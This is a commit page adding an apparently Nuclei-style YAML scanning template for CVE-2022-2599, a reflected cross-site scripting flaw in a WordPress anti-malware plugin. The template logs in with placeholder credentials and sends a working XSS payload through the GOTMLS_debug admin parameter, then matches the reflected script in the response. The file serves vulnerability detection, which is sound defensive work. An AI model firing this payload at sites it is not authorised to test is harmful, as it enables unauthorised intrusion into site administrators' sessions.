Create CVE-2022-2599.yaml
parent
8732719fe8
commit
67073fb02d
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2022-2599
|
||||
|
||||
info:
|
||||
name: Anti-Malware Security and Brute-Force Firewall < 4.21.83 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef
|
||||
- https://wordpress.org/plugins/gotmls/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2599
|
||||
classification:
|
||||
cve-id: CVE-2022-2599
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,xss,gotmls,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><img src onerror=alert(document.domain)>"
|
||||
- "GOTMLS_mt"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue